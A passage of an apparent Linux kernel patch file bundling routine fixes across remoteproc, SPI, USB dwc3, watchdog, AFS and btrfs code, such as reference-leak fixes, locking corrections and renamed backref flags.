+@@ -62,13 +62,16 @@ static int rcar_rproc_prepare(struct rproc *rproc)
+ 
+ 		rmem = of_reserved_mem_lookup(it.node);
+ 		if (!rmem) {
++			of_node_put(it.node);
+ 			dev_err(&rproc->dev,
+ 				"unable to acquire memory-region\n");
+ 			return -EINVAL;
+ 		}
+ 
+-		if (rmem->base > U32_MAX)
++		if (rmem->base > U32_MAX) {
++			of_node_put(it.node);
+ 			return -EINVAL;
++		}
+ 
+ 		/* No need to translate pa to da, R-Car use same map */
+ 		da = rmem->base;
+@@ -79,8 +82,10 @@ static int rcar_rproc_prepare(struct rproc *rproc)
+ 					   rcar_rproc_mem_release,
+ 					   it.node->name);
+ 
+-		if (!mem)
++		if (!mem) {
++			of_node_put(it.node);
+ 			return -ENOMEM;
++		}
+ 
+ 		rproc_add_carveout(rproc, mem);
+ 	}
+diff --git a/drivers/remoteproc/st_remoteproc.c b/drivers/remoteproc/st_remoteproc.c
+index a3268d95a50e6..e6bd3c7a950a2 100644
+--- a/drivers/remoteproc/st_remoteproc.c
++++ b/drivers/remoteproc/st_remoteproc.c
+@@ -129,6 +129,7 @@ static int st_rproc_parse_fw(struct rproc *rproc, const struct firmware *fw)
+ 	while (of_phandle_iterator_next(&it) == 0) {
+ 		rmem = of_reserved_mem_lookup(it.node);
+ 		if (!rmem) {
++			of_node_put(it.node);
+ 			dev_err(dev, "unable to acquire memory-region\n");
+ 			return -EINVAL;
+ 		}
+@@ -150,8 +151,10 @@ static int st_rproc_parse_fw(struct rproc *rproc, const struct firmware *fw)
+ 							   it.node->name);
+ 		}
+ 
+-		if (!mem)
++		if (!mem) {
++			of_node_put(it.node);
+ 			return -ENOMEM;
++		}
+ 
+ 		rproc_add_carveout(rproc, mem);
+ 		index++;
+diff --git a/drivers/remoteproc/stm32_rproc.c b/drivers/remoteproc/stm32_rproc.c
+index 7d782ed9e5896..23c1690b8d73f 100644
+--- a/drivers/remoteproc/stm32_rproc.c
++++ b/drivers/remoteproc/stm32_rproc.c
+@@ -223,11 +223,13 @@ static int stm32_rproc_prepare(struct rproc *rproc)
+ 	while (of_phandle_iterator_next(&it) == 0) {
+ 		rmem = of_reserved_mem_lookup(it.node);
+ 		if (!rmem) {
++			of_node_put(it.node);
+ 			dev_err(dev, "unable to acquire memory-region\n");
+ 			return -EINVAL;
+ 		}
+ 
+ 		if (stm32_rproc_pa_to_da(rproc, rmem->base, &da) < 0) {
++			of_node_put(it.node);
+ 			dev_err(dev, "memory region not valid %pa\n",
+ 				&rmem->base);
+ 			return -EINVAL;
+@@ -254,8 +256,10 @@ static int stm32_rproc_prepare(struct rproc *rproc)
+ 							   it.node->name);
+ 		}
+ 
+-		if (!mem)
++		if (!mem) {
++			of_node_put(it.node);
+ 			return -ENOMEM;
++		}
+ 
+ 		rproc_add_carveout(rproc, mem);
+ 		index++;
+diff --git a/drivers/scsi/qedi/qedi_main.c b/drivers/scsi/qedi/qedi_main.c
+index f2ee49756df8d..45d3595541820 100644
+--- a/drivers/scsi/qedi/qedi_main.c
++++ b/drivers/scsi/qedi/qedi_main.c
+@@ -2450,6 +2450,9 @@ static void __qedi_remove(struct pci_dev *pdev, int mode)
+ 		qedi_ops->ll2->stop(qedi->cdev);
+ 	}
+ 
++	cancel_delayed_work_sync(&qedi->recovery_work);
++	cancel_delayed_work_sync(&qedi->board_disable_work);
++
+ 	qedi_free_iscsi_pf_param(qedi);
+ 
+ 	rval = qedi_ops->common->update_drv_state(qedi->cdev, false);
+diff --git a/drivers/soc/qcom/llcc-qcom.c b/drivers/soc/qcom/llcc-qcom.c
+index 26efe12012a0d..d4d3eced52f35 100644
+--- a/drivers/soc/qcom/llcc-qcom.c
++++ b/drivers/soc/qcom/llcc-qcom.c
+@@ -122,10 +122,11 @@ struct llcc_slice_config {
+ 
+ struct qcom_llcc_config {
+ 	const struct llcc_slice_config *sct_data;
+-	int size;
+-	bool need_llcc_cfg;
+ 	const u32 *reg_offset;
+ 	const struct llcc_edac_reg_offset *edac_reg_offset;
++	int size;
++	bool need_llcc_cfg;
++	bool no_edac;
+ };
+ 
+ enum llcc_reg_offset {
+@@ -454,6 +455,7 @@ static const struct qcom_llcc_config sdm845_cfg = {
+ 	.need_llcc_cfg	= false,
+ 	.reg_offset	= llcc_v1_reg_offset,
+ 	.edac_reg_offset = &llcc_v1_edac_reg_offset,
++	.no_edac	= true,
+ };
+ 
+ static const struct qcom_llcc_config sm6350_cfg = {
+@@ -1001,7 +1003,14 @@ static int qcom_llcc_probe(struct platform_device *pdev)
+ 		goto err;
+ 
+ 	drv_data->ecc_irq = platform_get_irq_optional(pdev, 0);
+-	if (drv_data->ecc_irq >= 0) {
++
++	/*
++	 * On some platforms, the access to EDAC registers will be locked by
++	 * the bootloader. So probing the EDAC driver will result in a crash.
++	 * Hence, disable the creation of EDAC platform device for the
++	 * problematic platforms.
++	 */
++	if (!cfg->no_edac) {
+ 		llcc_edac = platform_device_register_data(&pdev->dev,
+ 						"qcom_llcc_edac", -1, drv_data,
+ 						sizeof(*drv_data));
+diff --git a/drivers/spi/spi-fsl-cpm.c b/drivers/spi/spi-fsl-cpm.c
+index 17a44d4f50218..38452089e8f35 100644
+--- a/drivers/spi/spi-fsl-cpm.c
++++ b/drivers/spi/spi-fsl-cpm.c
+@@ -21,6 +21,7 @@
+ #include <linux/spi/spi.h>
+ #include <linux/types.h>
+ #include <linux/platform_device.h>
++#include <linux/byteorder/generic.h>
+ 
+ #include "spi-fsl-cpm.h"
+ #include "spi-fsl-lib.h"
+@@ -120,6 +121,21 @@ int fsl_spi_cpm_bufs(struct mpc8xxx_spi *mspi,
+ 		mspi->rx_dma = mspi->dma_dummy_rx;
+ 		mspi->map_rx_dma = 0;
+ 	}
++	if (t->bits_per_word == 16 && t->tx_buf) {
++		const u16 *src = t->tx_buf;
++		u16 *dst;
++		int i;
++
++		dst = kmalloc(t->len, GFP_KERNEL);
++		if (!dst)
++			return -ENOMEM;
++
++		for (i = 0; i < t->len >> 1; i++)
++			dst[i] = cpu_to_le16p(src + i);
++
++		mspi->tx = dst;
++		mspi->map_tx_dma = 1;
++	}
+ 
+ 	if (mspi->map_tx_dma) {
+ 		void *nonconst_tx = (void *)mspi->tx; /* shut up gcc */
+@@ -173,6 +189,13 @@ void fsl_spi_cpm_bufs_complete(struct mpc8xxx_spi *mspi)
+ 	if (mspi->map_rx_dma)
+ 		dma_unmap_single(dev, mspi->rx_dma, t->len, DMA_FROM_DEVICE);
+ 	mspi->xfer_in_progress = NULL;
++
++	if (t->bits_per_word == 16 && t->rx_buf) {
++		int i;
++
++		for (i = 0; i < t->len; i += 2)
++			le16_to_cpus(t->rx_buf + i);
++	}
+ }
+ EXPORT_SYMBOL_GPL(fsl_spi_cpm_bufs_complete);
+ 
+diff --git a/drivers/spi/spi-fsl-spi.c b/drivers/spi/spi-fsl-spi.c
+index 5602f052b2b50..b14f430a699d0 100644
+--- a/drivers/spi/spi-fsl-spi.c
++++ b/drivers/spi/spi-fsl-spi.c
+@@ -177,26 +177,6 @@ static int mspi_apply_cpu_mode_quirks(struct spi_mpc8xxx_cs *cs,
+ 	return bits_per_word;
+ }
+ 
+-static int mspi_apply_qe_mode_quirks(struct spi_mpc8xxx_cs *cs,
+-				struct spi_device *spi,
+-				int bits_per_word)
+-{
+-	/* CPM/QE uses Little Endian for words > 8
+-	 * so transform 16 and 32 bits words into 8 bits
+-	 * Unfortnatly that doesn't work for LSB so
+-	 * reject these for now */
+-	/* Note: 32 bits word, LSB works iff
+-	 * tfcr/rfcr is set to CPMFCR_GBL */
+-	if (spi->mode & SPI_LSB_FIRST &&
+-	    bits_per_word > 8)
+-		return -EINVAL;
+-	if (bits_per_word <= 8)
+-		return bits_per_word;
+-	if (bits_per_word == 16 || bits_per_word == 32)
+-		return 8; /* pretend its 8 bits */
+-	return -EINVAL;
+-}
+-
+ static int fsl_spi_setup_transfer(struct spi_device *spi,
+ 					struct spi_transfer *t)
+ {
+@@ -224,9 +204,6 @@ static int fsl_spi_setup_transfer(struct spi_device *spi,
+ 		bits_per_word = mspi_apply_cpu_mode_quirks(cs, spi,
+ 							   mpc8xxx_spi,
+ 							   bits_per_word);
+-	else
+-		bits_per_word = mspi_apply_qe_mode_quirks(cs, spi,
+-							  bits_per_word);
+ 
+ 	if (bits_per_word < 0)
+ 		return bits_per_word;
+@@ -361,6 +338,22 @@ static int fsl_spi_prepare_message(struct spi_controller *ctlr,
+ 				t->bits_per_word = 32;
+ 			else if ((t->len & 1) == 0)
+ 				t->bits_per_word = 16;
++		} else {
++			/*
++			 * CPM/QE uses Little Endian for words > 8
++			 * so transform 16 and 32 bits words into 8 bits
++			 * Unfortnatly that doesn't work for LSB so
++			 * reject these for now
++			 * Note: 32 bits word, LSB works iff
++			 * tfcr/rfcr is set to CPMFCR_GBL
++			 */
++			if (m->spi->mode & SPI_LSB_FIRST && t->bits_per_word > 8)
++				return -EINVAL;
++			if (t->bits_per_word == 16 || t->bits_per_word == 32)
++				t->bits_per_word = 8; /* pretend its 8 bits */
++			if (t->bits_per_word == 8 && t->len >= 256 &&
++			    (mpc8xxx_spi->flags & SPI_CPM1))
++				t->bits_per_word = 16;
+ 		}
+ 	}
+ 	return fsl_spi_setup_transfer(m->spi, first);
+@@ -594,8 +587,14 @@ static struct spi_master *fsl_spi_probe(struct device *dev,
+ 	if (mpc8xxx_spi->type == TYPE_GRLIB)
+ 		fsl_spi_grlib_probe(dev);
+ 
+-	master->bits_per_word_mask =
+-		(SPI_BPW_RANGE_MASK(4, 16) | SPI_BPW_MASK(32)) &
++	if (mpc8xxx_spi->flags & SPI_CPM_MODE)
++		master->bits_per_word_mask =
++			(SPI_BPW_RANGE_MASK(4, 8) | SPI_BPW_MASK(16) | SPI_BPW_MASK(32));
++	else
++		master->bits_per_word_mask =
++			(SPI_BPW_RANGE_MASK(4, 16) | SPI_BPW_MASK(32));
++
++	master->bits_per_word_mask &=
+ 		SPI_BPW_RANGE_MASK(1, mpc8xxx_spi->max_bits_per_word);
+ 
+ 	if (mpc8xxx_spi->flags & SPI_QE_CPU_MODE)
+diff --git a/drivers/usb/dwc3/gadget.c b/drivers/usb/dwc3/gadget.c
+index 3faac3244c7db..e63700937ba8c 100644
+--- a/drivers/usb/dwc3/gadget.c
++++ b/drivers/usb/dwc3/gadget.c
+@@ -2478,7 +2478,7 @@ static void __dwc3_gadget_set_speed(struct dwc3 *dwc)
+ 	dwc3_writel(dwc->regs, DWC3_DCFG, reg);
+ }
+ 
+-static int dwc3_gadget_run_stop(struct dwc3 *dwc, int is_on, int suspend)
++static int dwc3_gadget_run_stop(struct dwc3 *dwc, int is_on)
+ {
+ 	u32			reg;
+ 	u32			timeout = 2000;
+@@ -2497,17 +2497,11 @@ static int dwc3_gadget_run_stop(struct dwc3 *dwc, int is_on, int suspend)
+ 			reg &= ~DWC3_DCTL_KEEP_CONNECT;
+ 		reg |= DWC3_DCTL_RUN_STOP;
+ 
+-		if (dwc->has_hibernation)
+-			reg |= DWC3_DCTL_KEEP_CONNECT;
+-
+ 		__dwc3_gadget_set_speed(dwc);
+ 		dwc->pullups_connected = true;
+ 	} else {
+ 		reg &= ~DWC3_DCTL_RUN_STOP;
+ 
+-		if (dwc->has_hibernation && !suspend)
+-			reg &= ~DWC3_DCTL_KEEP_CONNECT;
+-
+ 		dwc->pullups_connected = false;
+ 	}
+ 
+@@ -2552,7 +2546,6 @@ static int dwc3_gadget_soft_disconnect(struct dwc3 *dwc)
+ 	 * bit.
+ 	 */
+ 	dwc3_stop_active_transfers(dwc);
+-	__dwc3_gadget_stop(dwc);
+ 	spin_unlock_irqrestore(&dwc->lock, flags);
+ 
+ 	/*
+@@ -2589,7 +2582,19 @@ static int dwc3_gadget_soft_disconnect(struct dwc3 *dwc)
+ 	 * remaining event generated by the controller while polling for
+ 	 * DSTS.DEVCTLHLT.
+ 	 */
+-	return dwc3_gadget_run_stop(dwc, false, false);
++	ret = dwc3_gadget_run_stop(dwc, false);
++
++	/*
++	 * Stop the gadget after controller is halted, so that if needed, the
++	 * events to update EP0 state can still occur while the run/stop
++	 * routine polls for the halted state.  DEVTEN is cleared as part of
++	 * gadget stop.
++	 */
++	spin_lock_irqsave(&dwc->lock, flags);
++	__dwc3_gadget_stop(dwc);
++	spin_unlock_irqrestore(&dwc->lock, flags);
++
++	return ret;
+ }
+ 
+ static int dwc3_gadget_pullup(struct usb_gadget *g, int is_on)
+@@ -2643,7 +2648,7 @@ static int dwc3_gadget_pullup(struct usb_gadget *g, int is_on)
+ 
+ 		dwc3_event_buffers_setup(dwc);
+ 		__dwc3_gadget_start(dwc);
+-		ret = dwc3_gadget_run_stop(dwc, true, false);
++		ret = dwc3_gadget_run_stop(dwc, true);
+ 	}
+ 
+ 	pm_runtime_put(dwc->dev);
+@@ -4210,30 +4215,6 @@ static void dwc3_gadget_suspend_interrupt(struct dwc3 *dwc,
+ 	dwc->link_state = next;
+ }
+ 
+-static void dwc3_gadget_hibernation_interrupt(struct dwc3 *dwc,
+-		unsigned int evtinfo)
+-{
+-	unsigned int is_ss = evtinfo & BIT(4);
+-
+-	/*
+-	 * WORKAROUND: DWC3 revision 2.20a with hibernation support
+-	 * have a known issue which can cause USB CV TD.9.23 to fail
+-	 * randomly.
+-	 *
+-	 * Because of this issue, core could generate bogus hibernation
+-	 * events which SW needs to ignore.
+-	 *
+-	 * Refers to:
+-	 *
+-	 * STAR#9000546576: Device Mode Hibernation: Issue in USB 2.0
+-	 * Device Fallback from SuperSpeed
+-	 */
+-	if (is_ss ^ (dwc->speed == USB_SPEED_SUPER))
+-		return;
+-
+-	/* enter hibernation here */
+-}
+-
+ static void dwc3_gadget_interrupt(struct dwc3 *dwc,
+ 		const struct dwc3_event_devt *event)
+ {
+@@ -4251,11 +4232,7 @@ static void dwc3_gadget_interrupt(struct dwc3 *dwc,
+ 		dwc3_gadget_wakeup_interrupt(dwc);
+ 		break;
+ 	case DWC3_DEVICE_EVENT_HIBER_REQ:
+-		if (dev_WARN_ONCE(dwc->dev, !dwc->has_hibernation,
+-					"unexpected hibernation event\n"))
+-			break;
+-
+-		dwc3_gadget_hibernation_interrupt(dwc, event->event_info);
++		dev_WARN_ONCE(dwc->dev, true, "unexpected hibernation event\n");
+ 		break;
+ 	case DWC3_DEVICE_EVENT_LINK_STATUS_CHANGE:
+ 		dwc3_gadget_linksts_change_interrupt(dwc, event->event_info);
+@@ -4592,7 +4569,7 @@ int dwc3_gadget_suspend(struct dwc3 *dwc)
+ 	if (!dwc->gadget_driver)
+ 		return 0;
+ 
+-	dwc3_gadget_run_stop(dwc, false, false);
++	dwc3_gadget_run_stop(dwc, false);
+ 
+ 	spin_lock_irqsave(&dwc->lock, flags);
+ 	dwc3_disconnect_gadget(dwc);
+@@ -4613,7 +4590,7 @@ int dwc3_gadget_resume(struct dwc3 *dwc)
+ 	if (ret < 0)
+ 		goto err0;
+ 
+-	ret = dwc3_gadget_run_stop(dwc, true, false);
++	ret = dwc3_gadget_run_stop(dwc, true);
+ 	if (ret < 0)
+ 		goto err1;
+ 
+diff --git a/drivers/watchdog/dw_wdt.c b/drivers/watchdog/dw_wdt.c
+index 52962e8d11a6f..61af5d1332ac6 100644
+--- a/drivers/watchdog/dw_wdt.c
++++ b/drivers/watchdog/dw_wdt.c
+@@ -635,7 +635,7 @@ static int dw_wdt_drv_probe(struct platform_device *pdev)
+ 
+ 	ret = dw_wdt_init_timeouts(dw_wdt, dev);
+ 	if (ret)
+-		goto out_disable_clk;
++		goto out_assert_rst;
+ 
+ 	wdd = &dw_wdt->wdd;
+ 	wdd->ops = &dw_wdt_ops;
+@@ -666,12 +666,15 @@ static int dw_wdt_drv_probe(struct platform_device *pdev)
+ 
+ 	ret = watchdog_register_device(wdd);
+ 	if (ret)
+-		goto out_disable_pclk;
++		goto out_assert_rst;
+ 
+ 	dw_wdt_dbgfs_init(dw_wdt);
+ 
+ 	return 0;
+ 
++out_assert_rst:
++	reset_control_assert(dw_wdt->rst);
++
+ out_disable_pclk:
+ 	clk_disable_unprepare(dw_wdt->pclk);
+ 
+diff --git a/fs/afs/afs.h b/fs/afs/afs.h
+index 432cb4b239614..81815724db6c9 100644
+--- a/fs/afs/afs.h
++++ b/fs/afs/afs.h
+@@ -19,8 +19,8 @@
+ #define AFSPATHMAX		1024	/* Maximum length of a pathname plus NUL */
+ #define AFSOPAQUEMAX		1024	/* Maximum length of an opaque field */
+ 
+-#define AFS_VL_MAX_LIFESPAN	(120 * HZ)
+-#define AFS_PROBE_MAX_LIFESPAN	(30 * HZ)
++#define AFS_VL_MAX_LIFESPAN	120
++#define AFS_PROBE_MAX_LIFESPAN	30
+ 
+ typedef u64			afs_volid_t;
+ typedef u64			afs_vnodeid_t;
+diff --git a/fs/afs/internal.h b/fs/afs/internal.h
+index fd8567b98e2bb..cd23a3c5b6ace 100644
+--- a/fs/afs/internal.h
++++ b/fs/afs/internal.h
+@@ -127,7 +127,7 @@ struct afs_call {
+ 	spinlock_t		state_lock;
+ 	int			error;		/* error code */
+ 	u32			abort_code;	/* Remote abort ID or 0 */
+-	unsigned int		max_lifespan;	/* Maximum lifespan to set if not 0 */
++	unsigned int		max_lifespan;	/* Maximum lifespan in secs to set if not 0 */
+ 	unsigned		request_size;	/* size of request data */
+ 	unsigned		reply_max;	/* maximum size of reply */
+ 	unsigned		count2;		/* count used in unmarshalling */
+diff --git a/fs/afs/rxrpc.c b/fs/afs/rxrpc.c
+index 7817e2b860e5e..6862e3dde364b 100644
+--- a/fs/afs/rxrpc.c
++++ b/fs/afs/rxrpc.c
+@@ -334,7 +334,9 @@ void afs_make_call(struct afs_addr_cursor *ac, struct afs_call *call, gfp_t gfp)
+ 	/* create a call */
+ 	rxcall = rxrpc_kernel_begin_call(call->net->socket, srx, call->key,
+ 					 (unsigned long)call,
+-					 tx_total_len, gfp,
++					 tx_total_len,
++					 call->max_lifespan,
++					 gfp,
+ 					 (call->async ?
+ 					  afs_wake_up_async_call :
+ 					  afs_wake_up_call_waiter),
+@@ -349,10 +351,6 @@ void afs_make_call(struct afs_addr_cursor *ac, struct afs_call *call, gfp_t gfp)
+ 	}
+ 
+ 	call->rxcall = rxcall;
+-
+-	if (call->max_lifespan)
+-		rxrpc_kernel_set_max_life(call->net->socket, rxcall,
+-					  call->max_lifespan);
+ 	call->issue_time = ktime_get_real();
+ 
+ 	/* send the request */
+diff --git a/fs/btrfs/backref.c b/fs/btrfs/backref.c
+index 0d7ae20e39c9a..ab4bad7dfa6e9 100644
+--- a/fs/btrfs/backref.c
++++ b/fs/btrfs/backref.c
+@@ -45,7 +45,8 @@ static int check_extent_in_eb(struct btrfs_backref_walk_ctx *ctx,
+ 	int root_count;
+ 	bool cached;
+ 
+-	if (!btrfs_file_extent_compression(eb, fi) &&
++	if (!ctx->ignore_extent_item_pos &&
++	    !btrfs_file_extent_compression(eb, fi) &&
+ 	    !btrfs_file_extent_encryption(eb, fi) &&
+ 	    !btrfs_file_extent_other_encoding(eb, fi)) {
+ 		u64 data_offset;
+@@ -552,7 +553,7 @@ static int add_all_parents(struct btrfs_backref_walk_ctx *ctx,
+ 				count++;
+ 			else
+ 				goto next;
+-			if (!ctx->ignore_extent_item_pos) {
++			if (!ctx->skip_inode_ref_list) {
+ 				ret = check_extent_in_eb(ctx, &key, eb, fi, &eie);
+ 				if (ret == BTRFS_ITERATE_EXTENT_INODES_STOP ||
+ 				    ret < 0)
+@@ -564,7 +565,7 @@ static int add_all_parents(struct btrfs_backref_walk_ctx *ctx,
+ 						  eie, (void **)&old, GFP_NOFS);
+ 			if (ret < 0)
+ 				break;
+-			if (!ret && !ctx->ignore_extent_item_pos) {
++			if (!ret && !ctx->skip_inode_ref_list) {
+ 				while (old->next)
+ 					old = old->next;
+ 				old->next = eie;
+@@ -1598,7 +1599,7 @@ again:
+ 				goto out;
+ 		}
+ 		if (ref->count && ref->parent) {
+-			if (!ctx->ignore_extent_item_pos && !ref->inode_list &&
++			if (!ctx->skip_inode_ref_list && !ref->inode_list &&
+ 			    ref->level == 0) {
+ 				struct btrfs_tree_parent_check check = { 0 };
+ 				struct extent_buffer *eb;
+@@ -1639,7 +1640,7 @@ again:
+ 						  (void **)&eie, GFP_NOFS);
+ 			if (ret < 0)
+ 				goto out;
+-			if (!ret && !ctx->ignore_extent_item_pos) {
++			if (!ret && !ctx->skip_inode_ref_list) {
+ 				/*
+ 				 * We've recorded that parent, so we must extend
+ 				 * its inode list here.
+@@ -1735,7 +1736,7 @@ int btrfs_find_all_leafs(struct btrfs_backref_walk_ctx *ctx)
+ static int btrfs_find_all_roots_safe(struct btrfs_backref_walk_ctx *ctx)
+ {
+ 	const u64 orig_bytenr = ctx->bytenr;
+-	const bool orig_ignore_extent_item_pos = ctx->ignore_extent_item_pos;
++	const bool orig_skip_inode_ref_list = ctx->skip_inode_ref_list;
+ 	bool roots_ulist_allocated = false;
+ 	struct ulist_iterator uiter;
+ 	int ret = 0;
+@@ -1756,7 +1757,7 @@ static int btrfs_find_all_roots_safe(struct btrfs_backref_walk_ctx *ctx)
+ 		roots_ulist_allocated = true;
+ 	}
+ 
+-	ctx->ignore_extent_item_pos = true;
++	ctx->skip_inode_ref_list = true;
+ 
+ 	ULIST_ITER_INIT(&uiter);
+ 	while (1) {
+@@ -1781,7 +1782,7 @@ static int btrfs_find_all_roots_safe(struct btrfs_backref_walk_ctx *ctx)
+ 	ulist_free(ctx->refs);
+ 	ctx->refs = NULL;
+ 	ctx->bytenr = orig_bytenr;
+-	ctx->ignore_extent_item_pos = orig_ignore_extent_item_pos;
++	ctx->skip_inode_ref_list = orig_skip_inode_ref_list;
+ 
+ 	return ret;
+ }
+@@ -1885,7 +1886,7 @@ int btrfs_is_data_extent_shared(struct btrfs_inode *inode, u64 bytenr,
+ 		walk_ctx.time_seq = elem.seq;
+ 	}
+ 
+-	walk_ctx.ignore_extent_item_pos = true;
++	walk_ctx.skip_inode_ref_list = true;
+ 	walk_ctx.trans = trans;
+ 	walk_ctx.fs_info = fs_info;
+ 	walk_ctx.refs = &ctx->refs;
+diff --git a/fs/btrfs/backref.h b/fs/btrfs/backref.h
+index ef6bbea3f4562..1616e3e3f1e41 100644
+--- a/fs/btrfs/backref.h
++++ b/fs/btrfs/backref.h
+@@ -60,6 +60,12 @@ struct btrfs_backref_walk_ctx {
+ 	 * @extent_item_pos is ignored.
+ 	 */
+ 	bool ignore_extent_item_pos;
++	/*
++	 * If true and bytenr corresponds to a data extent, then the inode list
++	 * (each member describing inode number, file offset and root) is not
++	 * added to each reference added to the @refs ulist.
++	 */
++	bool skip_inode_ref_list;
+ 	/* A valid transaction handle or NULL. */
+ 	struct btrfs_trans_handle *trans;
+ 	/*
+diff --git a/fs/btrfs/block-rsv.c b/fs/btrfs/block-rsv.c
+index 5367a14d44d2a..4bb4a48758723 100644
+--- a/fs/btrfs/block-rsv.c
++++ b/fs/btrfs/block-rsv.c
+@@ -124,7 +124,8 @@ static u64 block_rsv_release_bytes(struct btrfs_fs_info *fs_info,
+ 	} else {
+ 		num_bytes = 0;
+ 	}
+-	if (block_rsv->qgroup_rsv_reserved >= block_rsv->qgroup_rsv_size) {
++	if (qgroup_to_release_ret &&
++	    block_rsv->qgroup_rsv_reserved >= block_rsv->qgroup_rsv_size) {
+ 		qgroup_to_release = block_rsv->qgroup_rsv_reserved -
+ 				    block_rsv->qgroup_rsv_size;
+ 		block_rsv->qgroup_rsv_reserved = block_rsv->qgroup_rsv_size;
+diff --git a/fs/btrfs/ctree.c b/fs/btrfs/ctree.c
+index 4754c9101a4c1..306cc735180fa 100644
+--- a/fs/btrfs/ctree.c
++++ b/fs/btrfs/ctree.c
+@@ -4493,10 +4493,12 @@ int btrfs_del_items(struct btrfs_trans_handle *trans, struct btrfs_root *root,
+ int btrfs_prev_leaf(struct btrfs_root *root, struct btrfs_path *path)
+ {
+ 	struct btrfs_key key;
++	struct btrfs_key orig_key;
+ 	struct btrfs_disk_key found_key;
+ 	int ret;
+ 
+ 	btrfs_item_key_to_cpu(path->nodes[0], &key, 0);
++	orig_key = key;
+ 
+ 	if (key.offset > 0) {
+ 		key.offset--;
+@@ -4513,8 +4515,36 @@ int btrfs_prev_leaf(struct btrfs_root *root, struct btrfs_path *path)
+ 
+ 	btrfs_release_path(path);
+ 	ret = btrfs_search_slot(NULL, root, &key, path, 0, 0);
+-	if (ret < 0)
++	if (ret <= 0)
+ 		return ret;
++
++	/*
++	 * Previous key not found. Even if we were at slot 0 of the leaf we had
++	 * before releasing the path and calling btrfs_search_slot(), we now may
++	 * be in a slot pointing to the same original key - this can happen if
++	 * after we released the path, one of more items were moved from a
++	 * sibling leaf into the front of the leaf we had due to an insertion
++	 * (see push_leaf_right()).
++	 * If we hit this case and our slot is > 0 and just decrement the slot
++	 * so that the caller does not process the same key again, which may or
++	 * may not break the caller, depending on its logic.
++	 */
++	if (path->slots[0] < btrfs_header_nritems(path->nodes[0])) {
++		btrfs_item_key(path->nodes[0], &found_key, path->slots[0]);
++		ret = comp_keys(&found_key, &orig_key);
++		if (ret == 0) {
++			if (path->slots[0] > 0) {
++				path->slots[0]--;
++				return 0;
++			}
++			/*
++			 * At slot 0, same key as before, it means orig_key is
++			 * the lowest, leftmost, key in the tree. We're done.
++			 */
++			return 1;
++		}
++	}
++
+ 	btrfs_item_key(path->nodes[0], &found_key, 0);
+ 	ret = comp_keys(&found_key, &key);
+ 	/*
+diff --git a/fs/btrfs/disk-io.c b/fs/btrfs/disk-io.c
+index 174d196d69609..fc1f3a91d8827 100644
+--- a/fs/btrfs/disk-io.c
++++ b/fs/btrfs/disk-io.c
+@@ -3306,23 +3306,34 @@ int btrfs_start_pre_rw_mount(struct btrfs_fs_info *fs_info)
+ {
+ 	int ret;
+ 	const bool cache_opt = btrfs_test_opt(fs_info, SPACE_CACHE);
+-	bool clear_free_space_tree = false;
++	bool rebuild_free_space_tree = false;
+ 
+ 	if (btrfs_test_opt(fs_info, CLEAR_CACHE) &&
+ 	    btrfs_fs_compat_ro(fs_info, FREE_SPACE_TREE)) {
+-		clear_free_space_tree = true;
++		rebuild_free_space_tree = true;
+ 	} else if (btrfs_fs_compat_ro(fs_info, FREE_SPACE_TREE) &&
+ 		   !btrfs_fs_compat_ro(fs_info, FREE_SPACE_TREE_VALID)) {
+ 		btrfs_warn(fs_info, "free space tree is invalid");
+-		clear_free_space_tree = true;
++		rebuild_free_space_tree = true;
+ 	}
+ 
+-	if (clear_free_space_tree) {
+-		btrfs_info(fs_info, "clearing free space tree");
+-		ret = btrfs_clear_free_space_tree(fs_info);
++	if (rebuild_free_space_tree) {
++		btrfs_info(fs_info, "rebuilding free space tree");
++		ret = btrfs_rebuild_free_space_tree(fs_info);
+ 		if (ret) {
+ 			btrfs_warn(fs_info,
+-				   "failed to clear free space tree: %d", ret);
++				   "failed to rebuild free space tree: %d", ret);
++			goto out;
++		}
++	}
++
++	if (btrfs_fs_compat_ro(fs_info, FREE_SPACE_TREE) &&
++	    !btrfs_test_opt(fs_info, FREE_SPACE_TREE)) {
++		btrfs_info(fs_info, "disabling free space tree");
++		ret = btrfs_delete_free_space_tree(fs_info);
++		if (ret) {
++			btrfs_warn(fs_info,
++				   "failed to disable free space tree: %d", ret);
+ 			goto out;
+ 		}
+ 	}
+diff --git a/fs/btrfs/file-item.c b/fs/btrfs/file-item.c
+index 5de73466b2ca2..d4d88ee04bf9e 100644
+--- a/fs/btrfs/file-item.c
++++ b/fs/btrfs/file-item.c
+@@ -52,13 +52,13 @@ void btrfs_inode_safe_disk_i_size_write(struct btrfs_inode *inode, u64 new_i_siz
+ 	u64 start, end, i_size;
+ 	int ret;
+ 
++	spin_lock(&inode->lock);
+ 	i_size = new_i_size ?: i_size_read(&inode->vfs_inode);
+ 	if (btrfs_fs_incompat(fs_info, NO_HOLES)) {
+ 		inode->disk_i_size = i_size;
+-		return;
++		goto out_unlock;
+ 	}
+ 
+-	spin_lock(&inode->lock);
+ 	ret = find_contiguous_extent_bit(&inode->file_extent_tree, 0, &start,
+ 					 &end, EXTENT_DIRTY);
+ 	if (!ret && start == 0)
+@@ -66,6 +66,7 @@ void btrfs_inode_safe_disk_i_size_write(struct btrfs_inode *inode, u64 new_i_siz
+ 	else
+ 		i_size = 0;
+ 	inode->disk_i_size = i_size;
++out_unlock:
+ 	spin_unlock(&inode->lock);
+ }
+ 
+diff --git a/fs/btrfs/free-space-cache.c b/fs/btrfs/free-space-cache.c
+index d84cef89cdff5..cf98a3c054802 100644
+--- a/fs/btrfs/free-space-cache.c
++++ b/fs/btrfs/free-space-cache.c
+@@ -870,15 +870,16 @@ static int __load_free_space_cache(struct btrfs_root *root, struct inode *inode,
+ 			}
+ 			spin_lock(&ctl->tree_lock);
+ 			ret = link_free_space(ctl, e);
+-			ctl->total_bitmaps++;
+-			recalculate_thresholds(ctl);
+-			spin_unlock(&ctl->tree_lock);
+ 			if (ret) {
++				spin_unlock(&ctl->tree_lock);
+ 				btrfs_err(fs_info,
+ 					"Duplicate entries in free space cache, dumping");
+ 				kmem_cache_free(btrfs_free_space_cachep, e);
+ 				goto free_cache;
+ 			}
++			ctl->total_bitmaps++;
++			recalculate_thresholds(ctl);
++			spin_unlock(&ctl->tree_lock);
+ 			list_add_tail(&e->list, &bitmaps);
+ 		}
+ 
+diff --git a/fs/btrfs/free-space-tree.c b/fs/btrfs/free-space-tree.c
+index c667e878ef1a6..3b623dce33793 100644
+--- a/fs/btrfs/free-space-tree.c
++++ b/fs/btrfs/free-space-tree.c
+@@ -1252,7 +1252,7 @@ out:
+ 	return ret;
+ }
+ 
+-int btrfs_clear_free_space_tree(struct btrfs_fs_info *fs_info)
